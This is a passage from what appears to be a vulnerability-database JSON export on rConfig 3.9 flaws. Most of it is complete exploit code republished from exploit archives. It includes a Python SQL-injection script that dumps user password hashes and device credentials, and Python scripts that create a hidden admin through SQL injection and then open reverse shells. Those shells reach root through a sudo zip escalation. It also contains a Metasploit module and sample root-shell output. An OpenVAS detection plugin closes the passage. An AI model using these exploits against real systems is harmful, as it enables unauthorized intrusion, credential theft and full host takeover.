port)\n\nrequest = requests.session()\n\nlogin_info = {\n \"user\": username,\n \"pass\": password,\n \"sublogin\": 1\n}\n\nlogin_request = request.post(\n target+\"/lib/crud/userprocess.php\",\n login_info,\n verify=False,\n allow_redirects=True\n )\n\ndashboard_request = request.get(target+\"/dashboard.php\", allow_redirects=False)\n\nif dashboard_request.status_code == 200:\n print (\"[+] Logged in successfully, triggering the payload...\")\n encoded_request = target+\"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random\".format(urllib.parse.quote(payload))\n print (\"[+] Check your listener !\")\n exploit_req = request.get(encoded_request)\n\nelif dashboard_request.status_code == 302:\n print (\"[-] Wrong credentials !\")\n exit()", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}}, {"lastseen": "2020-04-01T20:41:01", "description": "\nrConfig 3.9 - searchColumn SQL Injection", "edition": 1, "published": "2020-03-12T00:00:00", "title": "rConfig 3.9 - searchColumn SQL Injection", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10220"], "modified": "2020-03-12T00:00:00", "id": "EXPLOITPACK:D4882FF7F5ED2734A7C626D4055DCEDE", "href": "", "sourceData": "# Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection\n# Exploit Author: vikingfr\n# Date: 2020-03-03\n# CVE-2020-10220\n# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py\n# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig)\n# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip\n# Install scripts : \n# https://www.rconfig.com/downloads/scripts/install_rConfig.sh\n# https://www.rconfig.com/downloads/scripts/centos7_install.sh\n# https://www.rconfig.com/downloads/scripts/centos6_install.sh\n# Version: tested v3.9.4\n# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24\n#\n# Notes : If you want to reproduce in your lab environment follow those links :\n# http://help.rconfig.com/gettingstarted/installation\n# then\n# http://help.rconfig.com/gettingstarted/postinstall\n#\n# $ python3 rconfig_sqli.py https://1.1.1.1\n# rconfig 3.9 - SQL Injection PoC\n# [+] Triggering the payloads on https://1.1.1.1/commands.inc.php\n# [+] Extracting the current DB name :\n# rconfig2\n# [+] Extracting 10 first users :\n# admin:1:63a9f0ea7bb98050796b649e85481845\n# Maybe no more information ?\n# Maybe no more information ?\n# [snip]\n# [+] Extracting 10 first devices :\n# 127-0-0-1:127.0.0.1::ocdvulnpass:\n# deviceTestName:1.1.1.1:myusertest:mysecret:myenablesecret\n# Maybe no more information ?\n# Maybe no more information ?\n# [snip]\n# Done\n \n\n#!/usr/bin/python3\nimport requests\nimport sys\nimport urllib.parse\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n\nprint (\"rconfig 3.9 - SQL Injection PoC\")\nif len(sys.argv) != 2:\n print (\"[+] Usage : ./rconfig_exploit.py https://target\")\n exit()\n\nvuln_page=\"/commands.inc.php\"\nvuln_parameters=\"?searchOption=contains&searchField=vuln&search=search&searchColumn=command\"\ngiven_target = sys.argv[1]\ntarget = given_target\ntarget += vuln_page\ntarget += vuln_parameters\n\nrequest = requests.session()\ndashboard_request = request.get(target+vuln_page, allow_redirects=False, verify=False)\n\n\ndef extractDBinfos(myTarget=None,myPayload=None):\n\t\"\"\"\n\tExtract information from database\n\tArgs:\n\t\t- target+payload (String)\n\tReturns:\n\t\t- payload result (String)\n\t\"\"\"\n\tresult = \"\"\n\tencoded_request = myTarget+myPayload\n\texploit_req = request.get(encoded_request)\n\tif '[PWN]' in str(exploit_req.content):\n\t\tresult = str(exploit_req.content).split('[PWN]')[1]\n\telse:\n\t\tresult=\"Maybe no more information ?\"\n\t\n\treturn result\n\n\nif dashboard_request.status_code != 404:\n\tprint (\"[+] Triggering the payloads on \"+given_target+vuln_page)\n\t# get the db name\n\tprint (\"[+] Extracting the current DB name :\")\n\tdb_payload = \"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)%20limit%200,1),NULL--\"\n\tdb_name = extractDBinfos(target,db_payload)\n\tprint (db_name)\n # DB extract users\n\tprint (\"[+] Extracting 10 first users :\")\n\tfor i in range (0, 10):\n user1_payload=\"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,username,0x3A,id,0x3A,password,0x5B50574E5D3C42523E)%20FROM%20\"+db_name+\".users+limit+\"+str(i)+\",\"+str(i+1)+\"),NULL--\"\n user_h = extractDBinfos(target,user1_payload)\n #print (\"[+] Dump device \"+str(i))\n print (user_h)\n # DB extract devices information\n\tprint (\"[+] Extracting 10 first devices :\")\n\tfor i in range (0, 10):\n device_payload=\"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)%20FROM%20\"+db_name+\".nodes+limit+\"+str(i)+\",\"+str(i+1)+\"),NULL--\"\n device_h = extractDBinfos(target,device_payload)\n #print (\"[+] Dump device \"+str(i))\n print (device_h)\n \n\tprint (\"Done\")\n\t \nelse:\n print (\"[-] Please verify the URI\")\n exit()", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "packetstorm": [{"lastseen": "2020-03-19T23:37:23", "description": "", "published": "2020-03-16T00:00:00", "type": "packetstorm", "title": "Rconfig 3.x Chained Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10220", "CVE-2019-19585", "CVE-2019-19509"], "modified": "2020-03-16T00:00:00", "id": "PACKETSTORM:156766", "href": "https://packetstormsecurity.com/files/156766/Rconfig-3.x-Chained-Remote-Code-Execution.html", "sourceData": "`## \n# This module requires Metasploit: https://metasploit.com/download \n# Current source: https://github.com/rapid7/metasploit-framework \n## \n \nclass MetasploitModule < Msf::Exploit::Remote \nRank = GoodRanking \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'Rconfig 3.x Chained Remote Code Execution', \n'Description' => ' \nThis module exploits multiple vulnerabilities in rConfig version 3.9 \nin order to execute arbitrary commands. \nThis module takes advantage of a command injection vulnerability in the \n`path` parameter of the ajax archive file functionality within the rConfig web \ninterface in order to execute the payload. \nValid credentials for a user with administrative privileges are required. \nHowever, this module can bypass authentication via SQLI. \nThis module has been successfully tested on Rconfig 3.9.3 and 3.9.4. \nThe steps are: \n1. SQLi on /commands.inc.php allows us to add an administrative user. \n2. An authenticated session is established with the newly added user \n3. Command Injection on /lib/ajaxHandlers/ajaxArchiveFiles.php allows us to \nexecute the payload. \n4. Remove the added admin user. \nTips : once you get a shell, look at the CVE-2019-19585. \nYou will probably get root because rConfig install script add Apache user to \nsudoers with nopasswd ;-) \n', \n'License' => MSF_LICENSE, \n'Author' => \n[ \n'Jean-Pascal Thomas', # @vikingfr - Discovery, exploit and Metasploit module \n'Orange Cyberdefense' # Module tests - greetz : CSR-SO team (https://cyberdefense.orange.com/) \n], \n'References' => \n[ \n['CVE', '2019-19509'], # authenticated rce \n['CVE', '2020-10220'], # sqli auth bypass \n%w[EDB 47982], \n%w[EDB 48208], \n['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py'], # authenticated RCE \n['URL', 'https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py'] # unauthenticated SQLi \n], \n'Platform' => %w[unix linux], \n'Arch' => ARCH_CMD, \n'Targets' => [['Auto', {}]], \n'Privileged' => false, \n'DisclosureDate' => '2020-03-11', \n'DefaultOptions' => { \n'RPORT' => 443, \n'SSL' => true, # HTTPS is required for the module to work because the rConfig php code handle http to https redirects \n'PAYLOAD' => 'generic/shell_reverse_tcp' \n}, \n'DefaultTarget' => 0)) \nregister_options [ \nOptString.new('TARGETURI', [true, 'Base path to Rconfig', '/']) \n] \nend \n \n# CHECK IF RCONFIG IS REACHABLE AND INSTALLED \ndef check \nvprint_status 'STEP 0: Get rConfig version...' \nres = send_request_cgi!( \n'method' => 'GET', \n'uri' => '/login.php' \n) \nif !res || !res.get_html_document \nfail_with(Failure::Unknown, 'Could not check rConfig version') \nend \nif res.get_html_document.at('div[@id=\"footer-copyright\"]').text.include? 'rConfig Version 3.9' \nprint_good('rConfig version 3.9 detected') \nreturn Exploit::CheckCode::Appears \nelsif res.get_html_document.at('div[@id=\"footer-copyright\"]').text.include? 'rConfig' \nprint_status('rConfig detected, but not version 3.9') \nreturn Exploit::CheckCode::Detected \nend \nend \n \n# CREATE AN ADMIN USER IN RCONFIG \ndef create_rconfig_user(user, _password) \nvprint_status 'STEP 1 : Adding a temporary admin user...' \nfake_id = Rex::Text.rand_text_numeric(3) \nfake_pass = Rex::Text.rand_text_alpha(10) \nfake_pass_md5 = '21232f297a57a5a743894a0e4a801fc3' # hash of 'admin' \nfake_userid_md5 = '6c97424dc92f14ae78f8cc13cd08308d' \nuserleveladmin = 9 # Administrator \nuser_sqli = \"command ; INSERT INTO `users` (`id`,`username`,`password`,`userid`,`userlevel`,`email`,`timestamp`,`status`) VALUES (#{fake_id},'#{user}','#{fake_pass_md5}','#{fake_userid_md5}',#{userleveladmin}, '#{user}@domain.com', 1346920339, 1);--\" \nsqli_res = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, '/commands.inc.php'), \n'method' => 'GET', \n'vars_get' => { \n'search' => 'search', \n'searchOption' => 'contains', \n'searchField' => 'vuln', \n'searchColumn' => user_sqli \n} \n) \nunless sqli_res \nprint_warning('Failed to create user: Connection failed.') \nreturn \nend \nprint_good \"New temporary user #{user} created\" \nend \n \n# AUTHENTICATE ON RCONFIG \ndef login(user, pass) \nvprint_status \"STEP 2: Authenticating as #{user} ...\" \n# get session cookie (PHPSESSID) \nres = send_request_cgi!( \n'method' => 'GET', \n'uri' => '/login.php' \n) \n@cookie = res.get_cookies \nif @cookie.empty? \nfail_with Failure::UnexpectedReply, 'Failed to retrieve cookies' \nreturn \nend \n# authenticate \nres = send_request_cgi( \n'method' => 'POST', \n'uri' => normalize_uri(target_uri.path, '/lib/crud/userprocess.php'), \n'cookie' => @cookie, \n'vars_post' => { \npass: pass, \nuser: user, \nsublogin: 1 \n} \n) \nunless res \nprint_warning('Failed to authenticate: Connection failed.') \nreturn \nend \nprint_good \"Authenticated as user #{user}\" \nend \n \ndef trigger_rce(cmd, _opts = {}) \nvprint_status \"STEP 3: Executing the command (#{cmd})\" \ntrigger = \"`#{cmd} #`\" \nres = send_request_cgi( \n'method' => 'GET', \n'uri' => normalize_uri(target_uri.path, '/lib/ajaxHandlers/ajaxArchiveFiles.php'), \n'cookie' => @cookie, \n'vars_get' => { \n'path' => trigger, \n'ext' => 'random' \n} \n) \n# the page hangs because of the command being executed, so we can't expect HTTP response \n# unless res \n# fail_with Failure::Unreachable, 'Remote Code Execution failed: Connection failed' \n# return \n# end \n# unless res.body.include? '\"success\":true' \n# fail_with Failure::Unknown, 'It seems that the code was not executed' \n# return \n# end \nprint_good 'Command sucessfully executed' \nend \n \n# DELETE A USER \ndef delete_rconfig_user(user) \nvprint_status 'STEP 4 : Removing the temporary admin user...' \ndel_sqli = \"command ; DELETE FROM `users` WHERE `username`='#{user}';--\" \ndel_res = send_request_cgi( \n'uri' => normalize_uri(target_uri.path, '/commands.inc.php'), \n'method' => 'GET', \n'vars_get' => { \n'search' => 'search', \n'searchOption' => 'contains', \n'searchField' => 'vuln', \n'searchColumn' => del_sqli \n} \n) \nunless del_res \nprint_warning \"Removing user #{user} failed: Connection failed. Please remove it manually.\" \nreturn \nend \nprint_status \"User #{user} removed successfully !\" \nend \n \ndef cleanup \nsuper \ndelete_rconfig_user @username if @username \nend \n \ndef exploit \ncheck \n@username = rand_text_alphanumeric(8..12) \n@password = 'admin' \ncreate_res = create_rconfig_user @username, @password \nlogin(@username, @password) \ntmp_txt_file = Rex::Text.rand_text_alpha(10) \ntmp_zip_file = Rex::Text.rand_text_alpha(10) \n# The following payload (cf. 2019-19585) can be used to get root rev shell, but some payloads failed to execute (ex : because of quotes stuffs). Too bad :-( \n# trigger_rce(\"touch /tmp/#{tmp_txt_file}.txt;sudo zip -q /tmp/#{tmp_zip_file}.zip /tmp/#{tmp_txt_file}.txt -T -TT '/bin/sh -i>& /dev/tcp/#{datastore['LHOST']}/#{datastore['LPORT']} 0>&1 #'\") \ntrigger_rce(payload.encoded.to_s) \nend \nend \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156766/rconfig_ajaxarchivefiles_rce.rb.txt"}, {"lastseen": "2020-03-29T07:14:53", "description": "", "published": "2020-03-28T00:00:00", "type": "packetstorm", "title": "rConfig 3.9.4 searchField Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10220", "CVE-2019-19585", "CVE-2019-19509"], "modified": "2020-03-28T00:00:00", "id": "PACKETSTORM:156950", "href": "https://packetstormsecurity.com/files/156950/rConfig-3.9.4-searchField-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: rConfig 3.9.4 - 'searchField' Unauthenticated Root Remote Code Execution \n# Exploit Author: vikingfr \n# Greetz : Orange Cyberdefense - team CSR-SO (https://cyberdefense.orange.com) \n# Date: 2020-03-12 \n# CVE-2019-19509 + CVE-2019-19585 + CVE-2020-10220 \n# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_root_RCE_unauth.py \n# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig) \n# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip \n# Install scripts : \n# https://www.rconfig.com/downloads/scripts/install_rConfig.sh \n# https://www.rconfig.com/downloads/scripts/centos7_install.sh \n# https://www.rconfig.com/downloads/scripts/centos6_install.sh \n# Version: tested v3.9.4 \n# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24 \n# \n# Notes : If you want to reproduce in your lab environment follow those links : \n# http://help.rconfig.com/gettingstarted/installation \n# then \n# http://help.rconfig.com/gettingstarted/postinstall \n# \n# Example : \n# $ python3 rconfig_root_RCE_unauth_final.py http://1.1.1.1 1.1.1.2 3334 \n# rConfig - 3.9 - Unauthenticated root RCE \n# [+] Adding a temporary admin user... \n# [+] Authenticating as dywzxuvbah... \n# [+] Logged in successfully, triggering the payload... \n# [+] Check your listener ! \n# [+] The reverse shell seems to be opened :-) \n# [+] Removing the temporary admin user... \n# [+] Done. \n# \n# $ nc -nvlp 3334 \n# listening on [any] 3334 ... \n# connect to [1.1.1.2] from (UNKNOWN) [1.1.1.1] 46186 \n# sh: no job control in this shell \n# sh-4.2# id \n# id \n# uid=0(root) gid=0(root) groups=0(root) \n# sh-4.2# \n \n#!/usr/bin/python3 \nimport requests \nimport sys \nimport urllib.parse \nimport string \nimport random \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \nfrom requests.exceptions import Timeout \n \nprint (\"rConfig - 3.9 - Unauthenticated root RCE\") \n \nif len(sys.argv) != 4: \nprint (\"[+] Usage : ./rconfig_exploit.py https://target yourIP yourPort\") \nexit() \n \ntarget = sys.argv[1] \nip = sys.argv[2] \nport = sys.argv[3] \n \nvuln_page=\"/commands.inc.php\" \nvuln_parameters=\"?searchOption=contains&searchField=vuln&search=search&searchColumn=command\" \ndef generateUsername(stringLength=8): \nu= string.ascii_lowercase \nreturn ''.join(random.sample(u,stringLength)) \n \nprint (\"[+] Adding a temporary admin user...\") \nfake_id = str(random.randint(200,900)) \nfake_user = generateUsername(10) \nfake_pass_md5 = \"21232f297a57a5a743894a0e4a801fc3\" # hash of 'admin' \nfake_userid_md5 = \"6c97424dc92f14ae78f8cc13cd08308d\" \nuserleveladmin = 9 # Administrator \naddUserPayload=\"%20;INSERT%20INTO%20`users`%20(`id`,%20`username`,%20`password`,%20`userid`,%20`userlevel`,%20`email`,%20`timestamp`,%20`status`)%20VALUES%20(\"+fake_id+\",%20'\"+fake_user+\"',%20'\"+fake_pass_md5+\"',%20'\"+fake_userid_md5+\"',%209,%20'\"+fake_user+\"@domain.com',%201346920339,%201);--\" \nencoded_request = target+vuln_page+vuln_parameters+addUserPayload \nfirstrequest = requests.session() \nexploit_req = firstrequest.get(encoded_request,verify=False) \n \nrequest = requests.session() \nlogin_info = { \n\"user\": fake_user, \n\"pass\": \"admin\", \n\"sublogin\": 1 \n} \nprint (\"[+] Authenticating as \"+fake_user+\"...\") \nlogin_request = request.post( \ntarget+\"/lib/crud/userprocess.php\", \nlogin_info, \nverify=False, \nallow_redirects=True \n) \n \ndashboard_request = request.get(target+\"/dashboard.php\", allow_redirects=False) \n \npayload = ''' `touch /tmp/.'''+fake_user+'''.txt;sudo zip -q /tmp/.'''+fake_user+'''.zip /tmp/.'''+fake_user+'''.txt -T -TT '/bin/sh -i>& /dev/tcp/{0}/{1} 0>&1 #'` '''.format(ip, port) \nif dashboard_request.status_code == 200: \nprint (\"[+] Logged in successfully, triggering the payload...\") \nencoded_request = target+\"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random\".format(urllib.parse.quote(payload)) \nprint (\"[+] Check your listener !\") \ntry: \nexploit_req = request.get(encoded_request,timeout=10) \nexcept Timeout: \nprint('[+] The reverse shell seems to be opened :-)') \nelse: \nprint('[-] The command was not executed by the target or you forgot to open a listener...') \n \nelif dashboard_request.status_code == 302: \nprint (\"[-] Wrong credentials !? Maybe admin were not added...\") \nexit() \n \nprint(\"[+] Removing the temporary admin user...\") \ndelUserPayload=\"%20;DELETE%20FROM%20`users`%20WHERE%20`username`='\"+fake_user+\"';--\" \nencoded_request = target+vuln_page+vuln_parameters+delUserPayload \nlastrequest = requests.session() \nexploit_req = lastrequest.get(encoded_request,verify=False) \nprint (\"[+] Done.\") \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156950/rconfig394sf-exec.txt"}, {"lastseen": "2020-01-30T22:55:52", "description": "", "published": "2020-01-30T00:00:00", "type": "packetstorm", "title": "rConfig 3.9.3 Remote Code Execution", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-19509"], "modified": "2020-01-30T00:00:00", "id": "PACKETSTORM:156146", "href": "https://packetstormsecurity.com/files/156146/rConfig-3.9.3-Remote-Code-Execution.html", "sourceData": "`# Exploit Title: rConfig 3.9.3 - Authenticated Remote Code Execution \n# Date: 2019-11-07 \n# CVE-2019-19509 \n# Exploit Author: vikingfr \n# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig) \n# Software Link : http://files.rconfig.com/downloads/scripts/centos7_install.sh \n# Version: tested v3.9.3 \n# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24 \n# \n# Notes : If you want to reproduce in your lab environment follow those links : \n# http://help.rconfig.com/gettingstarted/installation \n# then \n# http://help.rconfig.com/gettingstarted/postinstall \n# \n# $ python3 rconfig_CVE-2019-19509.py https://192.168.43.34 admin root 192.168.43.245 8081 \n# rconfig - CVE-2019-19509 - Web authenticated RCE \n# [+] Logged in successfully, triggering the payload... \n# [+] Check your listener ! \n# ... \n# $ nc -nvlp 8081 \n# listening on [any] 8081 ... \n# connect to [192.168.43.245] from (UNKNOWN) [192.168.43.34] 34458 \n# bash: no job control in this shell \n# bash-4.2$ id \n# id \n# uid=48(apache) gid=48(apache) groups=48(apache) \n# bash-4.2$ \n \n#!/usr/bin/python3 \n \nimport requests \nimport sys \nimport urllib.parse \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \n \nprint (\"rconfig - CVE-2019-19509 - Web authenticated RCE\") \n \nif len(sys.argv) != 6: \nprint (\"[+] Usage : ./rconfig_exploit.py https://target username password yourIP yourPort\") \nexit() \n \ntarget = sys.argv[1] \nusername = sys.argv[2] \npassword = sys.argv[3] \nip = sys.argv[4] \nport = sys.argv[5] \npayload = '''`bash -i>& /dev/tcp/{0}/{1} 0>&1`'''.format(ip, port) \n \nrequest = requests.session() \n \nlogin_info = { \n\"user\": username, \n\"pass\": password, \n\"sublogin\": 1 \n} \n \nlogin_request = request.post( \ntarget+\"/lib/crud/userprocess.php\", \nlogin_info, \nverify=False, \nallow_redirects=True \n) \n \ndashboard_request = request.get(target+\"/dashboard.php\", allow_redirects=False) \n \nif dashboard_request.status_code == 200: \nprint (\"[+] Logged in successfully, triggering the payload...\") \nencoded_request = target+\"/lib/ajaxHandlers/ajaxArchiveFiles.php?path={0}&ext=random\".format(urllib.parse.quote(payload)) \nprint (\"[+] Check your listener !\") \nexploit_req = request.get(encoded_request) \n \nelif dashboard_request.status_code == 302: \nprint (\"[-] Wrong credentials !\") \nexit() \n`\n", "cvss": {"score": 9.0, "vector": "AV:N/AC:L/Au:S/C:C/I:C/A:C"}, "sourceHref": "https://packetstormsecurity.com/files/download/156146/rconfig393-exec.txt"}, {"lastseen": "2020-03-13T07:07:07", "description": "", "published": "2020-03-11T00:00:00", "type": "packetstorm", "title": "rConfig 3.9 SQL Injection", "bulletinFamily": "exploit", "cvelist": ["CVE-2020-10220"], "modified": "2020-03-11T00:00:00", "id": "PACKETSTORM:156688", "href": "https://packetstormsecurity.com/files/156688/rConfig-3.9-SQL-Injection.html", "sourceData": "`# Exploit Title: rConfig 3.9 - 'searchColumn' SQL Injection \n# Exploit Author: vikingfr \n# Date: 2020-03-03 \n# CVE-2020-10220 \n# Exploit link : https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2020-10220.py \n# Vendor Homepage: https://rconfig.com/ (see also : https://github.com/rconfig/rconfig) \n# Software Link : https://www.rconfig.com/downloads/rconfig-3.9.4.zip \n# Install scripts : \n# https://www.rconfig.com/downloads/scripts/install_rConfig.sh \n# https://www.rconfig.com/downloads/scripts/centos7_install.sh \n# https://www.rconfig.com/downloads/scripts/centos6_install.sh \n# Version: tested v3.9.4 \n# Tested on: Apache/2.4.6 (CentOS 7.7) OpenSSL/1.0.2k-fips PHP/7.2.24 \n# \n# Notes : If you want to reproduce in your lab environment follow those links : \n# http://help.rconfig.com/gettingstarted/installation \n# then \n# http://help.rconfig.com/gettingstarted/postinstall \n# \n# $ python3 rconfig_sqli.py https://1.1.1.1 \n# rconfig 3.9 - SQL Injection PoC \n# [+] Triggering the payloads on https://1.1.1.1/commands.inc.php \n# [+] Extracting the current DB name : \n# rconfig2 \n# [+] Extracting 10 first users : \n# admin:1:63a9f0ea7bb98050796b649e85481845 \n# Maybe no more information ? \n# Maybe no more information ? \n# [snip] \n# [+] Extracting 10 first devices : \n# 127-0-0-1:127.0.0.1::ocdvulnpass: \n# deviceTestName:1.1.1.1:myusertest:mysecret:myenablesecret \n# Maybe no more information ? \n# Maybe no more information ? \n# [snip] \n# Done \n \n \n#!/usr/bin/python3 \nimport requests \nimport sys \nimport urllib.parse \nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning \nrequests.packages.urllib3.disable_warnings(InsecureRequestWarning) \n \nprint (\"rconfig 3.9 - SQL Injection PoC\") \nif len(sys.argv) != 2: \nprint (\"[+] Usage : ./rconfig_exploit.py https://target\") \nexit() \n \nvuln_page=\"/commands.inc.php\" \nvuln_parameters=\"?searchOption=contains&searchField=vuln&search=search&searchColumn=command\" \ngiven_target = sys.argv[1] \ntarget = given_target \ntarget += vuln_page \ntarget += vuln_parameters \n \nrequest = requests.session() \ndashboard_request = request.get(target+vuln_page, allow_redirects=False, verify=False) \n \n \ndef extractDBinfos(myTarget=None,myPayload=None): \n\"\"\" \nExtract information from database \nArgs: \n- target+payload (String) \nReturns: \n- payload result (String) \n\"\"\" \nresult = \"\" \nencoded_request = myTarget+myPayload \nexploit_req = request.get(encoded_request) \nif '[PWN]' in str(exploit_req.content): \nresult = str(exploit_req.content).split('[PWN]')[1] \nelse: \nresult=\"Maybe no more information ?\" \n \nreturn result \n \n \nif dashboard_request.status_code != 404: \nprint (\"[+] Triggering the payloads on \"+given_target+vuln_page) \n# get the db name \nprint (\"[+] Extracting the current DB name :\") \ndb_payload = \"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,database(),0x5B50574E5D3C42523E)%20limit%200,1),NULL--\" \ndb_name = extractDBinfos(target,db_payload) \nprint (db_name) \n# DB extract users \nprint (\"[+] Extracting 10 first users :\") \nfor i in range (0, 10): \nuser1_payload=\"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,username,0x3A,id,0x3A,password,0x5B50574E5D3C42523E)%20FROM%20\"+db_name+\".users+limit+\"+str(i)+\",\"+str(i+1)+\"),NULL--\" \nuser_h = extractDBinfos(target,user1_payload) \n#print (\"[+] Dump device \"+str(i)) \nprint (user_h) \n# DB extract devices information \nprint (\"[+] Extracting 10 first devices :\") \nfor i in range (0, 10): \ndevice_payload=\"%20UNION%20ALL%20SELECT%20(SELECT%20CONCAT(0x223E3C42523E5B50574E5D,deviceName,0x3A,deviceIpAddr,0x3A,deviceUsername,0x3A,devicePassword,0x3A,deviceEnablePassword,0x5B50574E5D3C42523E)%20FROM%20\"+db_name+\".nodes+limit+\"+str(i)+\",\"+str(i+1)+\"),NULL--\" \ndevice_h = extractDBinfos(target,device_payload) \n#print (\"[+] Dump device \"+str(i)) \nprint (device_h) \n \nprint (\"Done\") \n \nelse: \nprint (\"[-] Please verify the URI\") \nexit() \n`\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/156688/rconfig39-sql.txt"}], "openvas": [{"lastseen": "2020-01-16T15:15:25", "bulletinFamily": "scanner", "cvelist": ["CVE-2019-19585", "CVE-2019-19509"], "description": "rConfig is prone to multiple vulnerabilities.", "modified": "2020-01-09T00:00:00", "published": "2020-01-09T00:00:00", "id": "OPENVAS:1361412562310113621", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310113621", "type": "openvas", "title": "rConfig <= 3.9.3 Multiple Vulnerabilities", "sourceData": "# Copyright (C) 2020 Greenbone Networks GmbH\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.113621\");\n script_version(\"2020-01-09T09:49:23+0000\");\n script_tag(name:\"last_modification\", value:\"2020-01-09 09:49:23 +0000 (Thu, 09 Jan 2020)\");\n script_tag(name:\"creation_date\", value:\"2020-01-09 09:38:07 +0000 (Thu, 09 Jan 2020)\");\n script_tag(name:\"cvss_base\", value:\"9.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:S/C:C/I:C/A:C\");\n\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n\n script_tag(name:\"solution_type\", value:\"NoneAvailable\");\n\n script_cve_id(\"CVE-2019-19509\", \"CVE-2019-19585\");\n\n script_name(\"rConfig <= 3.9.3 Multiple Vulnerabilities\");\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (C) 2020 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_rconfig_detect.nasl\");\n script_mandatory_keys(\"rconfig/detected\");\n\n script_tag(name:\"summary\", value:\"rConfig is prone to multiple vulnerabilities.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"The following vulnerabilities exist:\n\n - A remote authenticated user can directly execute system commands by sending a GET request\n to ajaxArchiveFiles.php because the path parameter is passed to the exec function without filtering.\n\n - The install script updates the /etc/sudoers file for rConfig specific tasks. After an\n rConfig specific Apache configuration update, Apache has high privileges for some binaries.\n This can be exploited by an attacker to bypass local security restrictions.\");\n script_tag(name:\"impact\", value:\"Successful exploitation would allow an authenticated attacker to gain complete\n control over the target system.\");\n script_tag(name:\"affected\", value:\"rConfig through version 3.9.3.\");\n script_tag(name:\"solution\", value:\"No known solution is available as of 09th January, 2020.\n Information regarding this issue will be updated once solution details are available.\");\n\n script_xref(name:\"URL\", value:\"https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_lpe.sh\");\n script_xref(name:\"URL\", value:\"https://github.com/v1k1ngfr/exploits-rconfig/blob/master/rconfig_CVE-2019-19509.py\");\n\n exit(0);\n}\n\nCPE = \"cpe:/a:rconfig:rconfig\";\n\ninclude( \"host_details.inc\" );\ninclude( \"version_func.inc\" );\n\nif( ! port = get_app_port( cpe: CPE ) ) exit( 0 );\nif( ! infos = get_app_version_and_location( cpe: CPE, port: port, exit_no_version: TRUE ) ) exit( 0 );\nversion = infos[\"version\"];\nlocation = infos[\"location\"];\n\nif( version_is_less_equal( version: version, test_version: \"3.9.3\" ) ) {\n report = report_fixed_ver( installed_version: version, 